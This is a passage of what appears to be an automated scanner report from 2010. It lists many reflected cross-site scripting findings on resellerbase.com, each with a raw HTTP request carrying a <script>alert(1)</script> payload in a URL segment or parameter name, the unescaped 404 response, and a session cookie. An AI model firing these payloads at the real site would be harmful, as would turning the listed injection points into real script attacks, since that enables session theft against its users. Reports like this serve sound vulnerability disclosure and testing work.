Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e09d<script>alert(1)</script>782daad0b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes3e09d<script>alert(1)</script>782daad0b1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes3e09d<script>alert(1)</script>782daad0b1/ was not found on this server.</p>
...[SNIP]...

2.5277. http://www.resellerbase.com/web-service/software-scripts/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d212a<script>alert(1)</script>4ebf22f88d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/?d212a<script>alert(1)</script>4ebf22f88d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/?d212a<script>alert(1)</script>4ebf22f88d1=1 was not found on this server.</p>
...[SNIP]...

2.5278. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ac80<script>alert(1)</script>50a731f0fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3ac80<script>alert(1)</script>50a731f0fdd/software-scripts/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3ac80<script>alert(1)</script>50a731f0fdd/software-scripts/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5279. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ad13<script>alert(1)</script>6c13d010212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts5ad13<script>alert(1)</script>6c13d010212/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts5ad13<script>alert(1)</script>6c13d010212/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5280. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 290c3<script>alert(1)</script>3f642a68084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes290c3<script>alert(1)</script>3f642a68084/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes290c3<script>alert(1)</script>3f642a68084/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5281. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3823a<script>alert(1)</script>aa0af620e11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos3823a<script>alert(1)</script>aa0af620e11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos3823a<script>alert(1)</script>aa0af620e11/ was not found on this server.</p>
...[SNIP]...

2.5282. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e4a7<script>alert(1)</script>6126acb8d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/?5e4a7<script>alert(1)</script>6126acb8d26=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/?5e4a7<script>alert(1)</script>6126acb8d26=1 was not found on this server.</p>
...[SNIP]...

2.5283. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e23ec<script>alert(1)</script>ada8d1c2082 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee23ec<script>alert(1)</script>ada8d1c2082/software-scripts/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee23ec<script>alert(1)</script>ada8d1c2082/software-scripts/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5284. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48d21<script>alert(1)</script>3c1e85b9675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts48d21<script>alert(1)</script>3c1e85b9675/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts48d21<script>alert(1)</script>3c1e85b9675/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5285. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6ff05<script>alert(1)</script>9cd2cf1f597 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes6ff05<script>alert(1)</script>9cd2cf1f597/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes6ff05<script>alert(1)</script>9cd2cf1f597/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5286. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22257<script>alert(1)</script>4529fa90553 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos22257<script>alert(1)</script>4529fa90553/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos22257<script>alert(1)</script>4529fa90553/images/ was not found on this server.</p>
...[SNIP]...

2.5287. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae50b<script>alert(1)</script>a30f998c5ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/imagesae50b<script>alert(1)</script>a30f998c5ea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/imagesae50b<script>alert(1)</script>a30f998c5ea/ was not found on this server.</p>
...[SNIP]...

2.5288. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cb761<script>alert(1)</script>ac73042935b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/?cb761<script>alert(1)</script>ac73042935b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/?cb761<script>alert(1)</script>ac73042935b=1 was not found on this server.</p>
...[SNIP]...

2.5289. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60f10<script>alert(1)</script>30d91c9d703 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service60f10<script>alert(1)</script>30d91c9d703/software-scripts/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service60f10<script>alert(1)</script>30d91c9d703/software-scripts/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5290. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66d05<script>alert(1)</script>a2f0f07ef23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts66d05<script>alert(1)</script>a2f0f07ef23/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts66d05<script>alert(1)</script>a2f0f07ef23/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5291. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60067<script>alert(1)</script>b8b023a7221 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes60067<script>alert(1)</script>b8b023a7221/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes60067<script>alert(1)</script>b8b023a7221/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5292. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c38ff<script>alert(1)</script>dc4040d1b97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosc38ff<script>alert(1)</script>dc4040d1b97/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosc38ff<script>alert(1)</script>dc4040d1b97/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5293. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3b987<script>alert(1)</script>2e9e5b86175 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images3b987<script>alert(1)</script>2e9e5b86175/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images3b987<script>alert(1)</script>2e9e5b86175/rating/ was not found on this server.</p>
...[SNIP]...

2.5294. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f8f4<script>alert(1)</script>be92489c92b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating8f8f4<script>alert(1)</script>be92489c92b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating8f8f4<script>alert(1)</script>be92489c92b/ was not found on this server.</p>
...[SNIP]...

2.5295. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload da9ca<script>alert(1)</script>a373de9001d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/?da9ca<script>alert(1)</script>a373de9001d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
